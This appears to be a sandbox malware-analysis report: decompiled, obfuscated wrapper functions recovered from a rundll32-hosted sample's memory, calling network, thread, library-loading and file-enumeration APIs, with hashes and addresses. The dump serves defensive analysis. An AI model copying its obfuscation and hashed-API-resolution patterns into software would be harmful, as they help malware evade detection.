Opcode Fuzzy Hash: 637634e9ca5f09ecfbf418dafc5c0319d1bfc3b194cb6f0e9aca650dbc649f10
Instruction Fuzzy Hash: 5F31F472901208BBDF05DF95CD058DEBFB6EF88304F108199F914A6260D7B69A20DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0020C87B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0020C87B(long __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, intOrPtr _a12, WCHAR* _a28, intOrPtr _a32, intOrPtr _a40, intOrPtr _a44) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _t48;
				void* _t49;
				signed int _t51;
				void* _t55;
				long _t56;
				short _t57;

				_push(_a44);
				_t57 = _a8;
				_push(_a40);
				_t49 = __edx;
				_push(0);
				_push(_a32);
				_t56 = __ecx;
				_push(_a28);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_t57 & 0x0000ffff);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001FE171(_t57 & 0x0000ffff);
				_v4 = 0x64d2;
				_v4 = _v4 ^ 0x15b6a29a;
				_v4 = _v4 ^ 0x15b6eb53;
				_a8 = 0x1ed3;
				_a8 = _a8 ^ 0x28e836b1;
				_a8 = _a8 >> 0xb;
				_a8 = _a8 ^ 0x00050213;
				_v8 = 0x449c;
				_t51 = 0x12;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x00002d4c;
				_v12 = 0xf059;
				_v12 = _v12 + 0xa304;
				_v12 = _v12 ^ 0x0001d4a0;
				_push(0x5bbeaddf);
				_push(_t51);
				_push(_t51);
				_push(0x262cac91);
				_t55 = 0x38;
				E001F606F(_t55);
				_t48 = InternetConnectW(_t49, _a28, _t57, 0, 0, _t56, 0, 0); // executed
				return _t48;
			}

0x0020c882
0x0020c886
0x0020c88c
0x0020c893
0x0020c895
0x0020c896
0x0020c89a
0x0020c89c
0x0020c8a0
0x0020c8a1
0x0020c8a2
0x0020c8a3
0x0020c8a7
0x0020c8a8
0x0020c8ac
0x0020c8ad
0x0020c8ae
0x0020c8b3
0x0020c8bd
0x0020c8c5
0x0020c8cd
0x0020c8d5
0x0020c8dd
0x0020c8e2
0x0020c8ea
0x0020c8f8
0x0020c8fe
0x0020c902
0x0020c90a
0x0020c912
0x0020c91a
0x0020c932
0x0020c937
0x0020c938
0x0020c939
0x0020c940
0x0020c941
0x0020c954
0x0020c95d

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 0020C954

Strings

L-, xrefs: 0020C902

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: L-
API String ID: 3050416762-1489653379
Opcode ID: 8ae0fa518b2dcdbf9abfc84fc44d0e9f0e4c60dc421aa98f0f97c7b1fdcd7d88
Instruction ID: 7108e7259f0334b82458b8f34c4522419af4442a678657258904bbe280a0b470
Opcode Fuzzy Hash: 8ae0fa518b2dcdbf9abfc84fc44d0e9f0e4c60dc421aa98f0f97c7b1fdcd7d88
Instruction Fuzzy Hash: D0210771508348AFD314DE56D88986BBFF9EBC6798F05480DF68046221C3B799589BA3

Uniqueness

Uniqueness Score: -1.00%

Function 002029A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00202A76

Strings

-:, xrefs: 002029C4

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: 63292dc5826d909282fa17df044cb9d07bc3ca0f96fa15fca28b467bc2bd30c7
Instruction ID: 3c768d0f94c46f39808edc952d9066cf65cb07f7488cd7919cde0fec46956098
Opcode Fuzzy Hash: 63292dc5826d909282fa17df044cb9d07bc3ca0f96fa15fca28b467bc2bd30c7
Instruction Fuzzy Hash: 2F2122B2D0121DBBDF15DFD5C84A8EEBBB5FF04758F108089EA2866250D3B94A54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001F30A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001F30A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001FE171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E001F606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x001f30ab
0x001f30ae
0x001f30b0
0x001f30b3
0x001f30b7
0x001f30b8
0x001f30bd
0x001f30c6
0x001f30cd
0x001f30d4
0x001f30db
0x001f30e2
0x001f30e9
0x001f30f5
0x001f30fa
0x001f30ff
0x001f3109
0x001f3114
0x001f3117
0x001f311e
0x001f3125
0x001f312c
0x001f314b
0x001f3154
0x001f315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 001F3154

Strings

_;m, xrefs: 001F313C

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: d75a0fcb5f25f2b99316df039cec5ce09b853bf13e00b914fbefc6796831680a
Instruction ID: 46f3c9bd8663bd7ad1a16111e97a8bfc761473bd593ada6aa4ffc36c5f7fd38b
Opcode Fuzzy Hash: d75a0fcb5f25f2b99316df039cec5ce09b853bf13e00b914fbefc6796831680a
Instruction Fuzzy Hash: 36113D76E0021CFFEB04DFE8CC468EEBBB1EB44310F108599E524AB292D7B55B119B91

Uniqueness

Uniqueness Score: -1.00%

Function 00201E15, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00201EC6

Strings

)@1, xrefs: 00201E87

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: )@1
API String ID: 1721193555-1769663298
Opcode ID: 28eb5814bbea609a12cb80a4985591a03b47f6da1d5e033d840ed02f22b0dc2d
Instruction ID: ad9d73c75cb450cdfd307ca055ba13d071ba2d60855c3514b5d812a6a1c58cc0
Opcode Fuzzy Hash: 28eb5814bbea609a12cb80a4985591a03b47f6da1d5e033d840ed02f22b0dc2d
Instruction Fuzzy Hash: 371134B5D0120DBBEB04CFE4D9468EEBBB4FF04300F208198E415A6261E3B55B459F91

Uniqueness

Uniqueness Score: -1.00%

Function 00207998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00207998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001FE171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E001F606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x0020799e
0x002079a1
0x002079a4
0x002079a9
0x002079ae
0x002079b5
0x002079bc
0x002079c3
0x002079c7
0x002079ce
0x002079d5
0x002079dc
0x002079e3
0x002079ea
0x002079f1
0x002079f5
0x002079f9
0x002079fd
0x00207a04
0x00207a0b
0x00207a12
0x00207a19
0x00207a1d
0x00207a30
0x00207a37
0x00207a3e
0x00207a3f
0x00207a4a
0x00207a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 00207A4A

Strings

rV, xrefs: 002079C7

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 3579dbe2716f49f86ab21cefec2b82da77ebb381ea17572b37b8d9f955c4b5f6
Instruction ID: 44da91896262588b1af8dfefed3c83628e53c39b587347ebc1dc2980a0d2b773
Opcode Fuzzy Hash: 3579dbe2716f49f86ab21cefec2b82da77ebb381ea17572b37b8d9f955c4b5f6
Instruction Fuzzy Hash: CA1104B6D1160DFBDB14DFE4CC4A4EEBBB4FB10309F208588E925662A0D3B58B149F90

Uniqueness

Uniqueness Score: -1.00%

Function 00200DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00200DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001FE171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E001F606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x00200deb
0x00200dee
0x00200df1
0x00200df6
0x00200dfb
0x00200e04
0x00200e0b
0x00200e18
0x00200e1c
0x00200e1f
0x00200e26
0x00200e32
0x00200e37
0x00200e3a
0x00200e41
0x00200e4c
0x00200e4d
0x00200e4e
0x00200e55
0x00200e58
0x00200e5f
0x00200e66
0x00200e6d
0x00200e78
0x00200e79
0x00200e7c
0x00200e8f
0x00200e9a
0x00200e9f

APIs

CloseHandle.KERNEL32(68F2FB55,?,?,?,?,?,?,?,?,002096D7), ref: 00200E9A

Strings

Hh, xrefs: 00200E58

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: 2d30ca32a6ffc236798e9ff273862c0f2eed62329043bff5e7d1f285292a42a2
Instruction ID: 1c9c300b968946d30a79d7a0dbe4166aeeff007ba237a15a375d04dee432f41d
Opcode Fuzzy Hash: 2d30ca32a6ffc236798e9ff273862c0f2eed62329043bff5e7d1f285292a42a2
Instruction Fuzzy Hash: 6B110374D0020DEBEF05DFA8C9469AEBFB5EB40304F60C599E524AB261D7B95B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 00200BA4, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00200BA4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t41;
				intOrPtr* _t52;
				void* _t53;
				signed int _t55;
				signed int _t56;
				void* _t64;

				_t64 = __edx;
				E001FE171(_t41);
				_v36 = 0x6f8801;
				asm("stosd");
				_t55 = 0x2e;
				asm("stosd");
				asm("stosd");
				_v8 = 0x52d9;
				_t56 = 0x1e;
				_v8 = _v8 / _t55;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x0001c65e;
				_v20 = 0xdb10;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x00004b9a;
				_v16 = 0xdd62;
				_v16 = _v16 | 0xf543142e;
				_v16 = _v16 ^ 0xf543ddd0;
				_v12 = 0x8dc3;
				_v12 = _v12 / _t56;
				_v12 = _v12 ^ 0x000076e3;
				_t52 = E001F606F(0x31c, 0x5d4069a4, _t56, _t56, 0xc211d5d7);
				_t53 =  *_t52(0, _a12, _t64, __ecx, __edx, _a4, _a8, _a12, 0); // executed
				return _t53;
			}

0x00200bb1
0x00200bbb
0x00200bc0
0x00200bce
0x00200bd1
0x00200bd4
0x00200bd5
0x00200bd6
0x00200be2
0x00200be3
0x00200be8
0x00200bef
0x00200bf6
0x00200bfd
0x00200c00
0x00200c07
0x00200c0e
0x00200c15
0x00200c1c
0x00200c2d
0x00200c35
0x00200c4f
0x00200c5d
0x00200c64

APIs

ObtainUserAgentString.URLMON(00000000,00004B9A,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00200C5D

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID:
API String ID: 2681117516-0
Opcode ID: b2c388cea8b45f713d3a9b1f8964a180a566a62310f5c234e0091ac6cfb6238e
Instruction ID: 0f64d5e2a22ec449f67aa98785c5923b0354c8ed1760d6198b6bbe6d4b061446
Opcode Fuzzy Hash: b2c388cea8b45f713d3a9b1f8964a180a566a62310f5c234e0091ac6cfb6238e
Instruction Fuzzy Hash: 952129B5E0020CBBEF14DFD5C80AAAEBBB1EB48300F108059E515A7290D7B55A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0020063C, Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0020063C(void* __ecx, void* __edx, intOrPtr _a8, _Unknown_base(*)()* _a12, intOrPtr _a16, void* _a24, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t38;
				void* _t46;

				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E001FE171(_t38);
				_v36 = 0x5d79d;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x21d9;
				_v12 = _v12 + 0xffffd1f5;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xf9e751c0;
				_v20 = 0x8632;
				_v20 = _v20 ^ 0xa6d456ee;
				_v20 = _v20 ^ 0xa6d4c126;
				_v8 = 0xd46a;
				_v8 = _v8 + 0xffff3ca6;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x1110320d;
				_v16 = 0x8d2;
				_v16 = _v16 ^ 0x8472359a;
				_v16 = _v16 ^ 0x84725201;
				E001F606F(0x2e3, 0xb6b01ae5, __ecx, __ecx, 0x63df9f97);
				_t46 = CreateThread(0, 0, _a12, _a24, 0, 0); // executed
				return _t46;
			}

0x00200644
0x00200649
0x0020064a
0x0020064b
0x0020064e
0x0020064f
0x00200652
0x00200655
0x00200658
0x0020065a
0x0020065b
0x00200660
0x0020066f
0x0020067a
0x00200682
0x00200683
0x0020068a
0x00200691
0x00200695
0x0020069c
0x002006a3
0x002006aa
0x002006b1
0x002006b8
0x002006bf
0x002006c3
0x002006ca
0x002006d1
0x002006d8
0x002006eb
0x002006fd
0x00200704

APIs

CreateThread.KERNEL32(00000000,00000000,A6D4C126,001F884A,00000000,00000000), ref: 002006FD

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9c070597ed3d18c6187f82ba64d2acddff06ff290175d3099bbf60b555776235
Instruction ID: f1abfd26e881da0b717e37b14bfdcb707755e83678a6254eaf3f0fe23f7511d1
Opcode Fuzzy Hash: 9c070597ed3d18c6187f82ba64d2acddff06ff290175d3099bbf60b555776235
Instruction Fuzzy Hash: EA21E371801229BBDB159FE5CC4A8DFBFB5EF08350F108549F92562220D3B69A15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F93CC, Relevance: 1.6, APIs: 1, Instructions: 62
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E001F93CC(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t57;
				int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001FE171(_t57);
				_v16 = 0x9ea9;
				_v16 = _v16 + 0xa8b1;
				_t74 = 0x78;
				_v16 = _v16 / _t74;
				_v16 = _v16 ^ 0xbd2fcf5a;
				_v16 = _v16 ^ 0xbd2fc2f3;
				_v12 = 0x9cd0;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 | 0xcb308c1b;
				_v12 = _v12 + 0xffff28dd;
				_v12 = _v12 ^ 0xcb2ffc41;
				_v20 = 0xa381;
				_v20 = _v20 + 0xa50c;
				_v20 = _v20 ^ 0x0001067d;
				_v8 = 0x961e;
				_t75 = 0xe;
				_v8 = _v8 / _t75;
				_t76 = 0x19;
				_v8 = _v8 / _t76;
				_v8 = _v8 / _t76;
				_v8 = _v8 ^ 0x00000e66;
				E001F606F(0x292, 0x262cac91, _t76, _t76, 0x7a08e3ee);
				_t72 = InternetCloseHandle(_a4); // executed
				return _t72;
			}

0x001f93d2
0x001f93d5
0x001f93d8
0x001f93dd
0x001f93e2
0x001f93eb
0x001f93f7
0x001f93fc
0x001f9401
0x001f9408
0x001f940f
0x001f9416
0x001f941a
0x001f9421
0x001f9428
0x001f942f
0x001f9436
0x001f943d
0x001f9444
0x001f944e
0x001f9453
0x001f945b
0x001f9463
0x001f9470
0x001f9478
0x001f9492
0x001f949d
0x001f94a2

APIs

InternetCloseHandle.WININET(CB2FFC41,?,?,?,?,?,?,?,?,0020BF3A), ref: 001F949D

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID:
API String ID: 1081599783-0
Opcode ID: 756eaa2da845cfde3b0946ee700a212743a1c7d64e3cd5568a966b5b83bbab17
Instruction ID: 49660e5b1263ebd74d8f581f0b63aee4664d5dd8d65456716d6bea925105aa5c
Opcode Fuzzy Hash: 756eaa2da845cfde3b0946ee700a212743a1c7d64e3cd5568a966b5b83bbab17
Instruction Fuzzy Hash: 0A213875E0020CFFEB08DFA5C84A9DEBBB1EB44300F10C589E814AA291D7B95B109F40

Uniqueness

Uniqueness Score: -1.00%

Function 002097E2, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E002097E2(void* __ecx, void* __edx, DWORD* _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				int _t45;

				_push(0);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E001FE171(_t37);
				_v12 = 0xac08;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x000296f1;
				_v20 = 0x60f3;
				_v20 = _v20 << 7;
				_v20 = _v20 ^ 0x0030678f;
				_v16 = 0xa02;
				_v16 = _v16 + 0xffff9052;
				_v16 = _v16 ^ 0xfffff28c;
				_v8 = 0x7c98;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x003a631f;
				E001F606F(0x11b, 0xb6b01ae5, __ecx, __ecx, 0x9b4def2a);
				_t45 = GetVolumeInformationW(_a16, 0, 0, _a8, 0, 0, 0, 0); // executed
				return _t45;
			}

0x002097eb
0x002097ec
0x002097ef
0x002097f2
0x002097f5
0x002097f6
0x002097f7
0x002097f8
0x002097fb
0x002097fe
0x00209801
0x00209803
0x00209804
0x00209809
0x00209813
0x0020981c
0x00209820
0x00209827
0x0020982e
0x00209832
0x00209839
0x00209840
0x00209847
0x0020984e
0x00209865
0x00209868
0x0020986b
0x0020987e
0x00209892
0x00209898

APIs

GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,FFFFF28C,00000000,00000000,00000000,00000000), ref: 00209892

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 90b67c2d00e979cf3e4ddb826130ea1a2e1c68c4bc0cb96d2cb91715836781cf
Instruction ID: b4e56e6db9e5998d16714e209f34d5d3498c50ac95cd0141261157a26fdc5806
Opcode Fuzzy Hash: 90b67c2d00e979cf3e4ddb826130ea1a2e1c68c4bc0cb96d2cb91715836781cf
Instruction Fuzzy Hash: 0311067580222CBBDF15DFA5CC4A8DFBFB9EF05364F108198F91962260D3759A20DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001FD4DC, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001FD4DC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, struct _WIN32_FIND_DATAW* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t49;
				int _t61;
				signed int _t63;
				signed int _t64;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001FE171(_t49);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x48a732;
				_v28 = 0x114af7;
				_v8 = 0x7883;
				_t63 = 0x67;
				_v8 = _v8 / _t63;
				_t64 = 0x15;
				_v8 = _v8 / _t64;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x00004630;
				_v20 = 0x9dee;
				_v20 = _v20 + 0xffff65f1;
				_v20 = _v20 ^ 0x00000e1e;
				_v12 = 0x585d;
				_v12 = _v12 | 0xc384218c;
				_v12 = _v12 * 0x71;
				_v12 = _v12 ^ 0x4d7987e4;
				_v16 = 0x84a7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x00042c8c;
				E001F606F(0x142, 0xb6b01ae5, _t64, _t64, 0xc093297e);
				_t61 = FindNextFileW(_a12, _a16); // executed
				return _t61;
			}

0x001fd4e2
0x001fd4e5
0x001fd4e8
0x001fd4eb
0x001fd4f0
0x001fd4f5
0x001fd4fb
0x001fd502
0x001fd509
0x001fd515
0x001fd51a
0x001fd522
0x001fd52d
0x001fd530
0x001fd534
0x001fd53b
0x001fd542
0x001fd549
0x001fd550
0x001fd557
0x001fd56e
0x001fd571
0x001fd578
0x001fd57f
0x001fd583
0x001fd596
0x001fd5a4
0x001fd5a9

APIs

FindNextFileW.KERNEL32(00000E1E,00000000,?,?,?,?,?,?,?,?,?,000003D5), ref: 001FD5A4

Memory Dump Source

Source File: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000014.00000002.2359030268.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.2359052434.000000000020F000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: a4293ad6bc18f7c0e48b1bb57c17bba87dbf413889f06720b3004ccbf768f501
Instruction ID: 79e9b157a770008c0467c8ff608a514bd1358f15d042ec5db8df84e0f9616473
Opcode Fuzzy Hash: a4293ad6bc18f7c0e48b1bb57c17bba87dbf413889f06720b3004ccbf768f501
Instruction Fuzzy Hash: A921E5B5D0020DEBDF08DFE4C94A99EBBB2FB44304F208099E914A7251D7B59B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 00207FC8, Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00207FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001FE171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
